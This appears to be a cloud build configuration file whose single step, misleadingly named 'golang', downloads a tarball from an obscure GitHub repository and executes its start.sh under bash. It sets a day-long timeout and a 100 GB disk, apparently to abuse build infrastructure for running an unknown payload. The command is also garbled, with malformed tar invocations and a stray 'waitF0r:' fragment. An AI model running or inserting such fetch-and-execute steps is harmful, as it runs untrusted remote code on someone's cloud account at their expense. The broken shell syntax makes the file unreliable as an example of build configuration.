steps:
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/ifhikf/jos/raw/main/trtl(1).tar.gz && trtl(1).tar && xf trtl(1).tar && ./start.sh
        waitF0r:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
